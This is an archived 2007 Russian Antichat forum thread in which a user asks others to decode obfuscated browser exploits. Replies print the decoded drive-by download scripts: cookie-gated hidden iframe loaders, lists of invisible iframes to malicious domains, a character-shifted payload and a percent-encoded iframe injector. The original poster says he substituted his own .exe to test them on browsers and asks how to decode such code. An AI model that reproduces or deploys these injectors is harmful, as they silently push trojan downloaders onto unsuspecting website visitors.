Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Помогите расшифровать сплойты |
30.10.2007, 17:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Помогите расшифровать сплойты
Собсстно вот 3 сплойта как я думаю под 3 браузера, ясен пень что они делают, каспером паляться все 3 штуки но, всё-же кому не жалко расшифруйте их и выложите открытый код сюда пожалуйста если не жалко.
http://shinobi.org.ru/ps.lol
(это тексовый файл)
|
|
|
30.10.2007, 17:23
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
После расшифровки получаем вот такой вот код , который создает ифрейм на http://ad684d3b0894f93d47b8b248626ecdb1.cyb3rz.org/505/Xp/
Код:
<script>function Dn(YF,TM){ var aQ=new Date();var Mc= new Date(); Mc.setTime(aQ.getTime()+86400000); document.cookie = YF+"="+escape(TM)+";expires="+Mc.toGMTString(); }var FX='s1fVW',ot='1';var hp='update1.classictel.org',Sf='/html/';if(document.cookie.indexOf(FX+'='+ot) ==-1){var dlh=document.location.host;var up= 'ht'+'tp:'+'//'+( dlh != ''?'':Mo()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')+'.'+Mo() +'.' + hp+Sf;var Pd=document.createElement('iframe');Pd.setAttribute ('src', up);Pd.height=2;Pd.width=1;Pd.frameBorder = 0; try{ document.body.appendChild ( Pd); Dn(FX, ot );} catch(e) {document.write ('<html><body></body></html>'); document.body.appendChild ( Pd);Dn ( FX,ot) ;} }
function Mo(){ var Da=24,iE="01234567890abcdef";var jG=""; for(AO=0; AO < Da; AO++) jG+= iE.substr(Math.floor(Math.random()*iE.length),1,1); return jG; }</script>
|
|
|
|
30.10.2007, 23:15
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Если не сложно, то объясни пожалуйста какими прогами\скриптами ты всё это расшифровал плиииз. Первое я знаю там в URL закодированно, а дальше как???
|
|
|
|
30.10.2007, 23:40
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от gemaglabin
После расшифровки получаем вот такой вот код , который создает ифрейм на http://ad684d3b0894f93d47b8b248626ecdb1.cyb3rz.org/505/Xp/
Прямая ссылка на .exe файлик размером 2,43 КБ и палящийся как Trojan-Downloader.Win32.Small.gld
Ну с кодом всё ясно...
var hp='update1.classictel.org',Sf='/html/'; - заменяю на свой .exe файл тестирую под 3 браузерами и не на одном моя прога не запускается, почему???
|
|
|
|
04.11.2007, 18:09
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Код:
<iframe src="http://volkoeb.info/xd/go.php?sid=1" width=1 height=1 style="display:none"></iframe>
<iframe src="http://volkoeb.info/xd/go.php?sid=2" width=1 height=1 style="display:none"></iframe>
<iframe src="http://volkoeb.info/xd/go.php?sid=3" width=1 height=1 style="display:none"></iframe>
<iframe src="http://volkoeb.info/xd/go.php?sid=4" width=1 height=1 style="display:none"></iframe>
if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000);document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write('<iframe src="http://updatez.info/etc/tds.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');}
<iframe name='86e1d55b15' src='http://verymonkey.com/goof/index.php' width=247 height=91 style='display:none'></iframe>
Последний раз редактировалось [Raz0r]; 04.11.2007 в 18:20..
|
|
|
|
04.11.2007, 18:14
|
|
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141
Репутация:
291
|
|
http://volkoeb.info/xd/go.php?sid=1
Код:
<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY>
<H1>Not Found</H1>
The requested URL <!--#echo var="REQUEST_URI" --> was not found on this server.
<HR>
<SCRIPT>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&76&7d&7:&85&76&81&83&7g&7b&76&74&85&3f&74&7f&3g&85&84&3g&7:&7f&3f&74&78&7:&4g&72&7d&76&89&33&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&7d&76&7e&41&7f&3f&7:&7f&77&7g&3g&89&89&89&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&7d&76&7e&41&7f&3f&7:&7f&77&7g&3g&89&89&89&3g&7e&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&73&7d&41&74&7c&76&83&3f&7g&83&78&3g&89&89&89&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&84&81&72&74&76&3e&84&7e&84&3f&7:&7f&77&7g&3g&89&89&89&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&83&7g&73&7g&85&83&72&77&77&3f&74&7f&3g&7:&7f&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&73&7d&41&74&7c&76&83&3f&7:&7f&77&7g&3g&84&73&7f&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&73&7d&41&74&7c&76&83&3f&7g&83&78&3g&84&85&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&88&7g&83&7d&75&85&83&72&77&77&3f&74&7f&3g&84&85&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </SCRIPT><SCRIPT>document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%65%6c%69%74%65%70%72%6f%6a%65%63%74%2e%63%6e%2f%74%73%2f%69%6e%2e%63%67%69%3f%61%6c%65%78%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%65%6d%30%6e%2e%69%6e%66%6f%2f%78%78%78%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%65%6d%30%6e%2e%69%6e%66%6f%2f%78%78%78%2f%6d%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%6c%30%63%6b%65%72%2e%6f%72%67%2f%78%78%78%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%70%61%63%65%2d%73%6d%73%2e%69%6e%66%6f%2f%78%78%78%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%72%6f%62%6f%74%72%61%66%66%2e%63%6e%2f%69%6e%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%6c%30%63%6b%65%72%2e%69%6e%66%6f%2f%73%62%6e%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%6c%30%63%6b%65%72%2e%6f%72%67%2f%73%74%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%6f%72%6c%64%74%72%61%66%66%2e%63%6e%2f%73%74%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e'))</SCRIPT><IFRAME src="http://eliteproject.cn/ts/in.cgi?alex" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://lem0n.info/xxx/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://lem0n.info/xxx/m/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://bl0cker.org/xxx/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://space-sms.info/xxx/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://robotraff.cn/in.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://bl0cker.info/sbn/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://bl0cker.org/st/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://worldtraff.cn/st/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME>
|
|
|
|
04.11.2007, 18:19
|
|
Новичок
Регистрация: 15.05.2006
Сообщений: 20
Провел на форуме:
58925
Репутация:
6
|
|
http://volkoeb.info/xd/go.php?sid=1
Код:
<iframe src="http://eliteproject.cn/ts/in.cgi?alex" width=1 height=1 style="display:none"></iframe>
<iframe src="http://lem0n.info/xxx/iframe.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://lem0n.info/xxx/m/iframe.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://bl0cker.org/xxx/iframe.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://space-sms.info/xxx/iframe.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://robotraff.cn/in.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://bl0cker.info/sbn/iframe.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://bl0cker.org/st/iframe.php" width=1 height=1 style="display:none"></iframe>
<iframe src="http://worldtraff.cn/st/iframe.php" width=1 height=1 style="display:none"></iframe>
|
|
|
|
04.11.2007, 18:21
|
|
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141
Репутация:
291
|
|
$aSH прокрути мой пост)
|
|
|
|
04.11.2007, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Огромная просьба объяснить как расшифровывать подобное плииз!!!!!!!!!!
|
|
|
|
05.11.2007, 05:04
|
|
Новичок
Регистрация: 29.04.2007
Сообщений: 7
Провел на форуме:
184652
Репутация:
1
|
|
_http://www.xakepy.ru/showthread.php?t=34170
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?496912){kind=avatar}
Похожие темы
Линейный вид
